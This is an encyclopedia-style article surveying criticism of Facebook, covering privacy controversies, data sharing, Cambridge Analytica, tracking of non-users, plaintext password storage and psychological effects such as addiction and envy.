Criticism of Facebook

Criticism of Facebook has led to international media coverage and significant reporting of its legal troubles and the outsize influence it has on the lives and health of its users and employees, as well on its influence on the way media, specifically news, is reported and distributed. Never use facebook. Notable issues include Internet privacy, such as use of a widespread "like" button on third-party websites tracking users,[1][2] possible indefinite records of user information,[3] automatic facial recognition software,[4][5] and its role in the workplace, including employer-employee account disclosure.[6] The use of Facebook can have negative psychological effects that include feelings of jealousy[7][8] and stress,[9][10] a lack of attention,[11] and social media addiction that in some cases is comparable to drug addiction.[12][13]

Facebook's operations have also received coverage. The company's electricity usage,[14] tax avoidance,[15] real-name user requirement policies,[16] censorship policies,[17][18] handling of user data,[19] and its involvement in the United States PRISM surveillance program have been highlighted by the media and by critics.[20] Facebook has come under scrutiny for 'ignoring' or shirking its responsibility for the content posted on its platform, including copyright and intellectual property infringement,[21] hate speech,[22][23] incitement of rape[24] and terrorism,[25][26] fake news,[27][28][29] Facebook murder, crimes, and violent incidents live-streamed through its Facebook Live functionality.[30][31][32]

The company and its employees have also been subject to litigation cases over the years,[33][34][35][36] with its most prominent case concerning allegations that CEO Mark Zuckerberg broke an oral contract with Cameron Winklevoss, Tyler Winklevoss, and Divya Narendra to build the then-named "HarvardConnection" social network in 2004, instead allegedly opting to steal the idea and code to launch Facebook months before HarvardConnection began.[37][38][39] The original lawsuit was eventually settled in 2009, with Facebook paying approximately $20 million in cash and 1.25 million shares.[40][41] A new lawsuit in 2011 was dismissed.[42] Some critics make predictions of Facebook's end based on the problems which they identify.

Facebook has been banned by several governments for various reasons, including Syria,[43] China,[44] and Iran.[45]

On August 13, 2019, it was revealed that the company had enlisted contractors to create and obtain transcripts of users.[46][47][48]

Privacy issues

Widening exposure of member information 2011–2012

In 2010, the Electronic Frontier Foundation identified two personal information aggregation techniques called "connections" and "instant personalization". They demonstrated that anyone could get access to information saved to a Facebook profile, even if the information was not intended to be made public.[49] A "connection" is created when a user clicks a "Like" button for a product or service, either on Facebook itself or an external site. Facebook treats such relationships as public information, and the user's identity may be displayed on the Facebook page of the product or service.[49]

Instant Personalization was a pilot program which shared Facebook account information with affiliated sites, such as sharing a user's list of "liked" bands with a music website, so that when the user visits the site, their preferred music plays automatically. The EFF noted that "For users that have not opted out, Instant Personalization is instant data leakage. As soon as you visit the sites in the pilot program (Yelp, Pandora, and Microsoft Docs) the sites can access your name, your picture, your gender, your current location, your list of friends, all the Pages you have Liked—everything Facebook classifies as public information. Even if you opt out of Instant Personalization, there's still data leakage if your friends use Instant Personalization websites—their activities can give away information about you, unless you block those applications individually."[49]

On December 27, 2012, CBS News reported that Randi Zuckerberg, sister of Facebook founder Mark Zuckerberg, criticized a friend for being "way uncool" in sharing a private Facebook photo of her on Twitter, only to be told that the image had appeared on a friend-of-a-friend's Facebook news feed. Commenting on this misunderstanding of Facebook's privacy settings, Eva Galperin of the EFF said "Even Randi Zuckerberg can get it wrong. That's an illustration of how confusing they can be."[50]

Issues during 2007

In August 2007, the code used to generate Facebook's home and search page as visitors browse the site was accidentally made public.[51][52] A configuration problem on a Facebook server caused the PHP code to be displayed instead of the web page the code should have created, raising concerns about how secure private data on the site was. A visitor to the site copied, published and later removed the code from his web forum, claiming he had been served and threatened with legal notice by Facebook.[53] Facebook's response was quoted by the site that broke the story:[54]

A small fraction of the code that displays Facebook web pages was exposed to a small number of users due to a single misconfigured web server that was fixed immediately. It was not a security breach and did not compromise user data in any way. Because the code that was released powers only Facebook user interface, it offers no useful insight into the inner workings of Facebook. The reprinting of this code violates several laws and we ask that people not distribute it further.

In November, Facebook launched Beacon, a system (discontinued in September 2009)[55] where third-party websites could include a script by Facebook on their sites, and use it to send information about the actions of Facebook users on their site to Facebook, prompting serious privacy concerns. Information such as purchases made and games played were published in the user's news feed. An informative notice about this action appeared on the third party site and allowed the user to cancel it. The user could also cancel it on Facebook. Originally if no action was taken, the information was automatically published. On November 29 this was changed to require confirmation from the user before publishing each story gathered by Beacon.

On December 1, Facebook's credibility in regard to the Beacon program was further tested when it was reported that The New York Times "essentially accuses" Mark Zuckerberg of lying to the paper and leaving Coca-Cola, which is reversing course on the program, with a similar impression.[56] A security engineer at CA, Inc. also claimed in a November 29, 2007, blog post that Facebook collected data from affiliate sites even when the consumer opted out and even when not logged into the Facebook site.[57] On November 30, 2007, the CA security blog posted a Facebook clarification statement addressing the use of data collected in the Beacon program:[58]

When a Facebook user takes a Beacon-enabled action on a participating site, information is sent to Facebook in order for Facebook to operate Beacon technologically. If a Facebook user clicks 'No, thanks' on the partner site notification, Facebook does not use the data and deletes it from its servers. Separately, before Facebook can determine whether the user is logged in, some data may be transferred from the participating site to Facebook. In those cases, Facebook does not associate the information with any individual user account, and deletes the data as well.

The Beacon service ended in September 2009 along with the settlement of a class-action lawsuit against Facebook resulting from the service.[55]

News Feed and Mini-Feed

On September 5, 2006, Facebook introduced two new features called "News Feed" and "Mini-Feed". The first of the new features, News Feed, appears on every Facebook member's home page, displaying recent Facebook activities of the member's friends. The second feature, Mini-Feed, keeps a log of similar events on each member's profile page.[59] Members can manually delete items from their Mini-Feeds if they wish to do so, and through privacy settings can control what is actually published in their respective Mini-Feeds.

Some Facebook members still feel that the ability to opt out of the entire News Feed and Mini-Feed system is necessary, as evidenced by a statement from the Students Against Facebook News Feed group, which peaked at over 740,000 members in 2006.[60] Reacting to users' concerns, Facebook developed new privacy features to give users some control over information about them that was broadcast by the News Feed.[61] According to subsequent news articles, members have widely regarded the additional privacy options as an acceptable compromise.[62]

In May 2010, Facebook added privacy controls and streamlined its privacy settings, giving users more ways to manage status updates and other information broadcast to the public News Feed.[63] Among the new privacy settings is the ability to control who sees each new status update a user posts: Everyone, Friends of Friends, or Friends Only. Users can now hide each status update from specific people as well.[64] However, a user who presses "like" or comments on the photo or status update of a friend cannot prevent that action from appearing in the news feeds of all the user's friends, even non-mutual ones. The "View As" option, used to show a user how privacy controls filter out what a specific given friend can see, only displays the user's timeline and gives no indication that items missing from the timeline may still be showing up in the friend's own news feed.

Cooperation with government requests

Government and local authorities rely on Facebook and other social networks to investigate crimes and obtain evidence to help establish a crime, provide location information, establish motives, prove and disprove alibis, and reveal communications.[65] Federal, state, and local investigations have not been restricted to profiles that are publicly available or willingly provided to the government; Facebook has willingly provided information in response to government subpoenas or requests, except with regard to private, unopened inbox messages less than 181 days old, which would require a warrant and a finding of probable cause under federal law under Electronic Communications Privacy Act (ECPA). One 2011 article noted that "even when the government lacks reasonable suspicion of criminal activity and the user opts for the strictest privacy controls, Facebook users still cannot expect federal law to stop their 'private' content and communications from being used against them".[66]

Facebook's privacy policy states that "We may also share information when we have a good faith belief it is necessary to prevent fraud or other illegal activity, to prevent imminent bodily harm, or to protect ourselves and you from people violating our Statement of Rights and Responsibilities. This may include sharing information with other companies, lawyers, courts or other government entities".[66] Since the U.S. Congress has failed to meaningfully amend the ECPA to protect most communications on social-networking sites such as Facebook, and since the U.S. Supreme Court has largely refused to recognize a Fourth Amendment privacy right to information shared with a third party, no federal statutory or constitutional right prevents the government from issuing requests that amount to fishing expeditions and there is no Facebook privacy policy that forbids the company from handing over private user information that suggests any illegal activity.[66]

The 2013 mass surveillance disclosures identified Facebook as a participant in the U.S. National Security Administration's PRISM program. Facebook now reports the number of requests it receives for user information from governments around the world.[67]

Complaint from CIPPIC

On May 31, 2008, the Canadian Internet Policy and Public Interest Clinic (CIPPIC), per Director Phillipa Lawson, filed a 35-page complaint with the Office of the Privacy Commissioner against Facebook based on 22 breaches of the Canadian Personal Information Protection and Electronic Documents Act (PIPEDA). University of Ottawa law students Lisa Feinberg, Harley Finkelstein, and Jordan Eric Plener, initiated the "minefield of privacy invasion" suit. Facebook's Chris Kelly contradicted the claims, saying that: "We've reviewed the complaint and found it has serious factual errors—most notably its neglect of the fact that almost all Facebook data is willingly shared by users."[68] Assistant Privacy Commissioner Elizabeth Denham released a report of her findings on July 16, 2009.[69] In it, she found that several of CIPPIC's complaints were well-founded. Facebook agreed to comply with some, but not all, of her recommendations.[69] The Assistant Commissioner found that Facebook did not do enough to ensure users granted meaningful consent for the disclosure of personal information to third parties and did not place adequate safeguards to prevent unauthorized access by third party developers to personal information.[69]

Data mining

There have been some concerns expressed regarding the use of Facebook as a means of surveillance and data mining.

Two Massachusetts Institute of Technology (MIT) students used an automated script to download the publicly posted information of over 70,000 Facebook profiles from four schools (MIT, NYU, the University of Oklahoma, and Harvard University) as part of a research project on Facebook privacy published on December 14, 2005.[70] Since then, Facebook has bolstered security protection for users, responding: "We've built numerous defenses to combat phishing and malware, including complex automated systems that work behind the scenes to detect and flag Facebook accounts that are likely to be compromised (based on anomalous activity like lots of messages sent in a short period of time, or messages with links that are known to be bad)."[71]

A second clause that brought criticism from some users allowed Facebook the right to sell users' data to private companies, stating "We may share your information with third parties, including responsible companies with which we have a relationship." This concern was addressed by spokesman Chris Hughes, who said, "Simply put, we have never provided our users' information to third party companies, nor do we intend to."[72] Facebook eventually removed this clause from its privacy policy.[73]

In the United Kingdom, the Trades Union Congress (TUC) has encouraged employers to allow their staff to access Facebook and other social-networking sites from work, provided they proceed with caution.[74]

In September 2007, Facebook drew criticism after it began allowing search engines to index profile pages, though Facebook's privacy settings allow users to turn this off.[75]

Concerns were also raised on the BBC's Watchdog program in October 2007 when Facebook was shown to be an easy way to collect an individual's personal information to facilitate identity theft.[76] However, there is barely any personal information presented to non-friends - if users leave the privacy controls on their default settings, the only personal information visible to a non-friend is the user's name, gender, profile picture and networks.[77]

An article in The New York Times in February 2008 pointed out that Facebook does not actually provide a mechanism for users to close their accounts, and raised the concern that private user data would remain indefinitely on Facebook's servers.[78] As of 2013, Facebook gives users the options to deactivate or delete their accounts. Deactivating an account allows it to be restored later, while deleting it will remove the account "permanently", although some data submitted by that account ("like posting to a group or sending someone a message") will remain.[79]

Onavo and Facebook Research

In 2013, Facebook acquired Onavo, a developer of mobile utility apps such as Onvao Protect VPN, which is used as part of an "Insights" platform to gauge the use and market share of apps.[80] This data has since been used to influence acquisitions and other business decisions regarding Facebook products.[81][82][83] Criticism of this practice emerged in 2018, when Facebook began to advertise the Onavo Protect VPN within its main app on iOS devices in the United States. Media outlets considered the app to effectively be spyware due to its behavior, adding that the app's listings did not readily disclaim Facebook's ownership of the app and its data collection practices.[84][85] Facebook subsequently pulled the iOS version of the app, citing new iOS App Store policies forbidding apps from performing analytics on the usage of other apps on a user's device.[86][87][88]

Since 2016, Facebook has also run "Project Atlas"—publicly known as "Facebook Research"—a market research program inviting teenagers and young adults between the ages of 13 and 35 to have data such as their app usage, web browsing history, web search history, location history, personal messages, photos, videos, emails, and Amazon order history, analyzed by Facebook. Participants would receive up to $20 per-month for participating in the program. Facebook Research is administered by third-party beta testing services, including Applause, and requires users to install a Facebook root certificate on their phone. After a January 2019 report by TechCrunch on Project Atlas, which alleged that Facebook bypassed the App Store by using an Apple enterprise program for apps used internally by a company's employees, Facebook refuted the article but later announced its discontinuation of the program on iOS.[89][90]

On January 30, 2019, Apple temporarily revoked Facebook's Enterprise Developer Program certificates for one day, which caused all of the company's internal iOS apps to become inoperable.[91][92][93] Apple stated that "Facebook has been using their membership to distribute a data-collecting app to consumers, which is a clear breach of their agreement with Apple", and that the certificates were revoked "to protect our users and their data".[91] US Senators Mark Warner, Richard Blumenthal, and Ed Markey separately criticized Facebook Research's targeting of teenagers, and promised to sponsor legislation to regulate market research programs.[94][95]

Inability to voluntarily terminate accounts

Facebook had allowed users to deactivate their accounts but not actually remove account content from its servers. A Facebook representative explained to a student from the University of British Columbia that users had to clear their own accounts by manually deleting all of the content including wall posts, friends, and groups. The New York Times noted the issue and raised a concern that emails and other private user data remain indefinitely on Facebook's servers.[78] Facebook subsequently began allowing users to permanently delete their accounts in 2010. Facebook's Privacy Policy now states, "When you delete an account, it is permanently deleted from Facebook."[73]

Memorials

A notable ancillary effect of social-networking websites is the ability for participants to mourn publicly for a deceased individual. On Facebook, friends often leave messages of sadness, grief, or hope on the individual's page, transforming it into a public book of condolences. This particular phenomenon has been documented at a number of schools.[96][97][98] Facebook originally held a policy that profiles of people known to be deceased would be removed after 30 days due to privacy concerns.[99] Due to user response, Facebook changed its policy to place deceased members' profiles in a "memorialization state".[100] Facebook's Privacy Policy regarding memorialization says, "If we are notified that a user is deceased, we may memorialize the user's account. In such cases we restrict profile access to confirmed friends and allow friends and family to write on the user's Wall in remembrance. We may close an account if we receive a formal request from the user's next of kin or other proper legal request to do so."[73]

Some of these memorial groups have also caused legal issues. Notably, on January 1, 2008, one such memorial group posted the identity of murdered Toronto teenager Stefanie Rengel, whose family had not yet given the Toronto Police Service their consent to release her name to the media, and the identities of her accused killers, in defiance of Canada's Youth Criminal Justice Act, which prohibits publishing the names of the under-age accused.[101] While police and Facebook staff attempted to comply with the privacy regulations by deleting such posts, they noted difficulty in effectively policing the individual users who repeatedly republished the deleted information.[102]

Customization and security

In July 2007, Adrienne Felt, an undergraduate student at the University of Virginia, discovered a cross-site scripting (XSS) hole in the Facebook Platform that could inject JavaScript into profiles. She used the hole to import custom CSS and demonstrate how the platform could be used to violate privacy rules or create a worm.[103]

Quit Facebook Day

Quit Facebook Day was an online event which took place on May 31, 2010 (coinciding with Memorial Day), in which Facebook users stated that they would quit the social network due to privacy concerns.[104] It was estimated that 2% of Facebook users coming from the United States would delete their accounts.[105] However, only 33,000 (roughly 0.0066% of its roughly 500 million members at the time) users quit the site.[106] The number one reason for users to quit Facebook was privacy concerns (48%), being followed by a general dissatisfaction with Facebook (14%), negative aspects regarding Facebook friends (13%), and the feeling of getting addicted to Facebook (6%). Facebook quitters were found to be more concerned about privacy, more addicted to the Internet, and more conscientious.[107]

Photo recognition and face tagging

Facebook enabled an automatic facial recognition feature in June 2011, called "Tag Suggestions", a product of a research project named "DeepFace".[108] The feature compares newly uploaded photographs to those of the uploader's Facebook friends, to suggest photo tags.

National Journal Daily claims "Facebook is facing new scrutiny over its decision to automatically turn on a new facial recognition feature aimed at helping users identify their friends in photos".[109] Facebook has defended the feature, saying users can disable it.[110] Facebook introduced the feature on an opt-out basis.[111] European Union data-protection regulators said they would investigate the feature to see if it violated privacy rules.[110][112] Naomi Lachance stated in a web blog for NPR, All Tech Considered, that Facebook's facial recognition is right 98% of the time compared to the FBI's 85% out of 50 people. However, the accuracy of Facebook searches is due to its larger, more diverse photo selection compared to the FBI's closed database.[113] Mark Zuckerberg showed no worries when speaking about Facebook's AIs, saying, "Unsupervised learning is a long-term focus of our AI research team at Facebook, and it remains an important challenge for the whole AI research community" and "It will save lives by diagnosing diseases and driving us around more safely. It will enable breakthroughs by helping us find new planets and understand Earth's climate. It will help in areas we haven't even thought of today".[114]

Investigation by the Irish Data Protection Commissioner, 2011–2012

In August 2011, the Irish Data Protection Commissioner (DPC) started an investigation after receiving 22 complaints by europe-v-facebook.org, which was founded by a group of Austrian students.[115] The DPC stated in first reactions that the Irish DPC is legally responsible for privacy on Facebook for all users within the European Union[116] and that he will "investigate the complaints using his full legal powers if necessary".[117] The complaints were filed in Ireland because all users who are not residents of the United States or Canada have a contract with "Facebook Ireland Ltd", located in Dublin, Ireland. Under European law Facebook Ireland is the "data controller" for facebook.com, and therefore, facebook.com is governed by European data protection laws.[116] Facebook Ireland Ltd. was established by Facebook Inc. to avoid US taxes (see Double Irish arrangement).[118]

The group 'europe-v-facebook.org' made access requests at Facebook Ireland and received up to 1,222 pages of data per person in 57 data categories that Facebook was holding about them,[119] including data that was previously removed by the users.[120] The group claimed that Facebook failed to provide some of the requested data, including "likes", facial recognition data, data about third party websites that use "social plugins" visited by users, and information about uploaded videos. Currently the group claims that Facebook holds at least 84 data categories about every user.[121]

The first 16 complaints target different problems, from undeleted old "pokes" all the way to the question if sharing and new functions on Facebook should be opt-in or opt-out.[122] The second wave of 6 more complaints was targeting more issues including one against the "Like" button.[123] The most severe could be a complaint that claims that the privacy policy, and the consent to the privacy policy is void under European laws.

In an interview with the Irish Independent, a spokesperson said that the DPC will "go and audit Facebook, go into the premises and go through in great detail every aspect of security". He continued by saying: "It's a very significant, detailed and intense undertaking that will stretch over four or five days." In December 2011 the DPC published its first report on Facebook. This report was not legally binding but suggested changes that Facebook should undertake until July 2012. The DPC is planning to do a review about Facebook's progress in July 2012.

Changes

In spring 2012, Facebook had to undertake many changes (e.g., having an extended download tool that should allow users to exercise the European right to access all stored information or an update of the worldwide privacy policy). These changes were seen as not sufficient to comply with European law by europe-v-facebook.org. The download tool does not allow, for example, access to all data. The group has launched our-policy.org[124] to suggest improvements to the new policy, which they saw as a backdrop for privacy on Facebook. Since the group managed to get more than 7.000 comments on Facebook's pages, Facebook had to do a worldwide vote on the proposed changes. Such a vote would have only been binding if 30% of all users would have taken part. Facebook did not promote the vote, resulting in only 0.038% participation with about 87% voting against Facebook's new policy. The new privacy policy took effect on the same day.[125]

Tracking of non-members of Facebook

An article published by USA Today in November 2011 claimed that Facebook creates logs of pages visited both by its members and by non-members, relying on tracking cookies to keep track of pages visited.[126]

In early November 2015, Facebook was ordered by the Belgian Privacy Commissioner to cease tracking non-users, citing European laws, or risk fines of up to £250,000 per day.[127] As a result, instead of removing tracking cookies, Facebook banned non-users in Belgium from seeing any material on Facebook, including publicly posted content, unless they sign in. Facebook criticized the ruling, saying that the cookies provided better security.[128][129]

Stalking

By statistics, 63% of Facebook profiles are automatically set "visible to the public", meaning anyone can access the profiles that users have updated. Facebook also has its own built-in messaging system that people can send messages to any other user, unless they have disabled the feature to "from friends only". Stalking is not only limited to SNS stalking, but can lead to further "in-person" stalking because nearly 25% of real-life stalking victims reported it started with online instant messaging (e.g., Facebook chat).[130][131]

Performative surveillance

Performative surveillance is the notion that people are very much aware that they are being surveilled on websites, like Facebook, and use the surveillance as an opportunity to portray themselves in a way that connotes a certain lifestyle—of which, that individual may, or may not, distort how they are perceived in reality.[132]

2010 application privacy breach

In 2010, the Wall Street Journal found that many of Facebook's top-rated apps—including apps from Zynga and Lolapps—were transmitting identifying information to "dozens of advertising and Internet tracking companies" like RapLeaf. The apps used an HTTP referer that exposed the user's identity and sometimes their friends' identities. Facebook said that "While knowledge of user ID does not permit access to anyone’s private information on Facebook, we plan to introduce new technical systems that will dramatically limit the sharing of User ID’s". A blog post by a member of Facebook's team further stated that "press reports have exaggerated the implications of sharing a user ID", though still acknowledging that some of the apps were passing the ID in a manner that violated Facebook's policies.[133][134]

Facebook and Cambridge Analytica data scandal

In 2018, Facebook admitted[135][136] that an app made by Global Science Research and Alexandr Kogan, related to Cambridge Analytica, was able in 2014[137] to harvest personal data of up to 87 million Facebook users without their consent, by exploiting their friendship connection to the users who sold their data via the app.[138] Following the revelations of the breach, several public figures, including industrialist Elon Musk and WhatsApp cofounder Brian Acton, announced that they were deleting their Facebook accounts, using the hashtag "#deletefacebook".[139][140][141]

Facebook was also criticized for allowing the 2012 Barack Obama presidential campaign to analyze and target select users by providing the campaign with friendship connections of users who signed up for an application. However, users signing up for the application were aware that their data, but not the data of their friends, was going to a political party.[142][143][144][145][146]

Employer-employee privacy issues

In an effort to surveil the personal lives of current, or prospective, employees, some employers have asked employees to disclose their Facebook login information. This has resulted in the passing of a bill in New Jersey making it illegal for employers to ask potential or current employees for access to their Facebook accounts.[147] Although the U.S government has yet to pass a national law protecting prospective employees and their social networking sites, from employers, the fourth amendment of the US constitution can protect prospective employees in specific situations.[148][149] Lots of companies look at Facebook profiles of job candidates looking for reasons to not hire them. According to a survey of hiring managers by CareerBuilder.com, the most common deal breakers they found on Facebook profiles include references to drinking, poor communication skills, inappropriate photos, and lying about skills and/or qualifications.[150]

Facebook requires employees and contractors working for them to give permission for Facebook to access their personal profiles, including friend requests and personal messages.

Users violating minimum age requirements

A 2011 study in the online journal First Monday examines how parents consistently enable children as young as 10 years old to sign up for accounts, directly violating Facebook's policy banning young visitors. This policy is in compliance with a United States law, the 1998 Children's Online Privacy Protection Act, which requires minors aged under 13 to gain explicit parental consent to access commercial websites. In jurisdictions where a similar law sets a lower minimum age, Facebook enforces the lower age. Of the 1,007 households surveyed for the study, 76% of parents reported that their child joined Facebook at an age younger than 13, the minimum age in the site's terms of service. The study also reported that Facebook removes roughly 20,000 users each day for violating its minimum age policy. The study's authors also note, "Indeed, Facebook takes various measures both to restrict access to children and delete their accounts if they join." The findings of the study raise questions primarily about the shortcomings of United States federal law, but also implicitly continue to raise questions about whether or not Facebook does enough to publicize its terms of service with respect to minors. Only 53% of parents said they were aware that Facebook has a minimum signup age; 35% of these parents believe that the minimum age is merely a recommendation or thought the signup age was 16 or 18, not 13.[151]

Student privacy concerns

Students who post illegal or otherwise inappropriate material have faced disciplinary action from their universities, colleges, and schools including expulsion.[152] Others posting libelous content relating to faculty have also faced disciplinary action.[153] The Journal of Education for Business states that "a recent study of 200 Facebook profiles found that 42% had comments regarding alcohol, 53% had photos involving alcohol use, 20% had comments regarding sexual activities, 25% had seminude or sexually provocative photos, and 50% included the use of profanity."[154] It is inferred that negative or incriminating Facebook posts can affect alumni's and potential employers' perception of them. This perception can greatly impact the students' relationships, ability to gain employment, and maintain school enrollment. The desire for social acceptance leads individuals to want to share the most intimate details of their personal lives along with illicit drug use and binge drinking. Too often, these portrayals of their daily lives are exaggerated and/or embellished to attract others like minded to them.[154]

Effect on higher education

On January 23, 2006, The Chronicle of Higher Education continued an ongoing national debate on social networks with an opinion piece written by Michael Bugeja, director of the Journalism School at Iowa State University, entitled "Facing the Facebook".[155] Bugeja, author of the Oxford University Press text Interpersonal Divide (2005), quoted representatives of the American Association of University Professors and colleagues in higher education to document the distraction of students using Facebook and other social networks during class and at other venues in the wireless campus. Bugeja followed up on January 26, 2007 in The Chronicle with an article titled "Distractions in the Wireless Classroom",[156] quoting several educators across the country who were banning laptops in the classroom. Similarly, organizations such as the National Association for Campus Activities,[157] the Association for Education in Journalism and Mass Communication,[158] and others have hosted seminars and presentations to discuss ramifications of students' use of Facebook and other social-networking sites.

The EDUCAUSE Learning Initiative has also released a brief pamphlet entitled "7 Things You Should Know About Facebook" aimed at higher education professionals that "describes what [Facebook] is, where it is going, and why it matters to teaching and learning".[159]

Some research[160][161][162] on Facebook in higher education suggests that there may be some small educational benefits associated with student Facebook use, including improving engagement which is related to student retention.[162] 2012 research has found that time spent on Facebook is related to involvement in campus activities.[161] This same study found that certain Facebook activities like commenting and creating or RSVPing to events were positively related to student engagement while playing games and checking up on friends was negatively related. Furthermore, using technologies such as Facebook to connect with others can help college students be less depressed and cope with feelings of loneliness and homesickness.[163]

Effect on college student grades

As of February 2012, only four published peer-reviewed studies have examined the relationship between Facebook use and grades.[160][164][165][166] The findings vary considerably. Pasek et al. (2009)[166] found no relationship between Facebook use and grades. Kolek and Saunders (2008)[165] found no differences in overall grade point average (GPA) between users and non-users of Facebook. Kirschner and Karpinski (2010)[164] found that Facebook users reported a lower mean GPA than non-users. Junco's (2012)[160] study clarifies the discrepancies in these findings. While Junco (2012)[160] found a negative relationship between time spent on Facebook and student GPA in his large sample of college students, the real-world impact of the relationship was negligible. Furthermore, Junco (2012)[160] found that sharing links and checking up on friends were positively related to GPA while posting status updates was negatively related. In addition to noting the differences in how Facebook use was measured among the four studies, Junco (2012)[160] concludes that the ways in which students use Facebook are more important in predicting academic outcomes.

Phishing

Phishing refers to a scam used by criminals to trick people into revealing passwords, credit card information, and other sensitive information. On Facebook, phishing attempts occur through message or wall posts from a friend's account that was breached. If the user takes the bait, the phishers gain access to the user's Facebook account and send phishing messages to the user's other friends. The point of the post is to get the users to visit a website with viruses and malware.[150]

Unpublished photo disclosure bug

In September 2018, a software bug meant that photos that had been uploaded to Facebook accounts, but that had not been "published" (and which therefore should have remained private between the user and Facebook), were exposed to app developers.[167] Approximately 6.8 million users and 1500 third-party apps were affected.[167]

In December 2018, it emerged that Facebook had, during the period 2010–2018, granted access to users' private messages, address book contents, and private posts, without the users' consent, to more than 150 third parties including Microsoft, Amazon, Yahoo, Netflix, and Spotify. This had been occurring despite public statements from Facebook that it had stopped such sharing years earlier.[168]

Denial of location privacy, regardless of user settings

In December 2018, it emerged that Facebook's mobile app reveals the user's location to Facebook, even if the user does not use the "check in" feature and has configured all relevant settings within the app so as to maximize location privacy.[169]

E-commerce and drop shipping scams

In April 2016, Buzzfeed published an article exposing drop shippers who were using Facebook and Instagram to swindle unsuspecting customers. Located mostly in China, these drop shippers and e-commerce sites would steal copyrighted images from larger retailers and influencers to gain credibility. After luring a customer with a low price for the item, they would then deliver a product that is nothing like what was advertised or deliver no product at all.[170]

In February 2019, it emerged that a number of Facebook apps, including Flo, had been sending users' health data such as blood pressure and ovulation status to Facebook without users' informed consent.[171][172][173][174] New York governor Andrew Cuomo called the practice an "outrageous abuse of privacy", ordered New York's department of state and department of financial services to investigate, and encouraged federal regulators to step in.[175]

International lobbying against privacy protections

In early 2019, it was reported that Facebook had spent years lobbying extensively against privacy protection laws around the world, such as the General Data Protection Regulation (GDPR).[176] [177]

The lobbying included efforts by Sandberg to "bond" with female European officials including Enda Kenny (then Prime Minister of Ireland, where Facebook's European operations are based), to influence them in Facebook's favor.[176] Other politicians reportedly lobbied by Facebook in relation to privacy protection laws included George Osborne (then Chancellor of the Exchequer), Pranab Mukherjee (then President of India), and Michel Barnier.[176]

Unencrypted password storage

In March 2019, Facebook admitted that it had mistakenly stored "hundreds of millions" of passwords of Facebook and Instagram users in plaintext (as opposed to being hashed and salted) on multiple internal systems accessible only to Facebook engineers, dating as far back as 2012. Facebook stated that affected users would be notified, but that there was no evidence that this data had been abused or leaked.[178][179]

In April 2019, Facebook admitted that its subsidiary Instagram also stored millions of unencrypted passwords.[180]

Promotion of service as "free"

In December 2019, the Hungarian Competition Authority fined Facebook around US$4 million for false advertising, ruling that Facebook cannot market itself as a "free" (no cost) service because the use of detailed personal information to deliver targeted advertising constituted a compensation that must be provided to Facebook to use the service.[181]

Providing ads through "snooping"

There has been a controversy in our world today about Facebook spying on people by listening to conversations. “Facebook is eavesdropping on you,” says Jamie Court, the president of Los Angeles-based Consumer Watchdog nonprofit. “It’s just in a different way.” The truth is, Facebook tracks us in ways many of us don't even realize and is so good at it, we think it's monitoring our conversations. Instead, it uses sophisticated demographic and location data to serve up ads.[182] This has led to a series of paranoia incidents as a result of the fear of being watched or monitored. Facebook has denied that it listens to our conversations and in turn releases ads, based on those conversations for years. During the middle of 2016, Facebook stated "Facebook does not use your phone's microphone to inform ads or to change what you see in News Feed. Some recent articles have suggested that we must be listening to people's conversations in order to show them relevant ads. This is not true. We show ads based on people's interests and other profile information, not what you’re talking out loud about."[183]

Psychological/sociological effects

Facebook addiction

The "World Unplugged" study, which was conducted in 2011, claims that for some users quitting social networking sites is comparable to quitting smoking or giving up alcohol.[184] Another study conducted in 2012 by researchers from the University of Chicago Booth School of Business in the United States found that drugs like alcohol and tobacco could not keep up with social networking sites regarding their level of addictiveness.[185] A 2013 study in the journal CyberPsychology, Behavior, and Social Networking found that some users decided to quit social networking sites because they felt they were addicted. In 2014, the site went down for about 30 minutes, prompting several users to call emergency services.[186]

In April 2015, the Pew Research Center published a survey of 1,060 U.S. teenagers ages 13 to 17 who reported that nearly three-quarters of them either owned or had access to a smartphone, 92 percent went online daily with 24 percent saying they went online "almost constantly."[187] In March 2016, Frontiers in Psychology published a survey of 457 post-secondary student Facebook users (following a face validity pilot of another 47 post-secondary student Facebook users) at a large university in North America showing that the severity of ADHD symptoms had a statistically significant positive correlation with Facebook usage while driving a motor vehicle and that impulses to use Facebook while driving were more potent among male users than female users.[188]

In June 2018, Children and Youth Services Review published a regression analysis of 283 adolescent Facebook users in the Piedmont and Lombardy regions of Northern Italy (that replicated previous findings among adult users) showing that adolescents reporting higher ADHD symptoms positively predicted Facebook addiction, persistent negative attitudes about the past and that the future is predetermined and not influenced by present actions, and orientation against achieving future goals, with ADHD symptoms additionally increasing the manifestation of the proposed category of psychological dependence known as "problematic social media use."[189]

Self-harm and suicide

Research shows that people who are feeling suicidal use the internet to search for suicide methods. Websites provide graphic details and information on how to take your own life. This cannot be right. Where this content breaches the policies of internet and social media providers it must be removed.

I do not think it is going too far to question whether even you, the owners, any longer have any control over [the sites'] content. If that is the case, then children should not be accessing your services at all, and parents should be aware that the idea of any authority overseeing algorithms and content is a mirage.

In January 2019, both the Health Secretary of the United Kingdom, and the Children’s Commissioner for England, urged Facebook and other social media companies to take responsibility for the risk to children posed by content on their platforms related to self-harm and suicide.[191]

Envy

Facebook has been criticized for making people envious and unhappy due to the constant exposure to positive yet unrepresentative highlights of their peers. Such highlights include, but are not limited to, journal posts, videos, and photos that depict or reference such positive or otherwise outstanding activities, experiences, and facts. This effect is caused mainly by the fact that most users of Facebook usually only display the positive aspects of their lives while excluding the negative, though it is also strongly connected to inequality and the disparities between social groups as Facebook is open to users from all classes of society. Sites such as AddictionInfo.org[192] state that this kind of envy has profound effects on other aspects of life and can lead to severe depression, self-loathing, rage and hatred, resentment, feelings of inferiority and insecurity, pessimism, suicidal tendencies and desires, social isolation, and other issues that can prove very serious. This condition has often been called "Facebook Envy" or "Facebook Depression" by the media.[193][194][195][196][197][198]

A joint study conducted by two German universities demonstrated Facebook envy and found that as many as one out of three people actually feel worse and less satisfied with their lives after visiting the site. Vacation photos were found to be the most common source of feelings of resentment and jealousy. After that, social interaction was the second biggest cause of envy, as Facebook users compare the number of birthday greetings, likes, and comments to those of their friends. Visitors who contributed the least tended to feel the worst. "According to our findings, passive following triggers invidious emotions, with users mainly envying happiness of others, the way others spend their vacations; and socialize," the study states.[199]

A 2013 study by researchers at the University of Michigan found that the more people used Facebook, the worse they felt afterwards.[200]

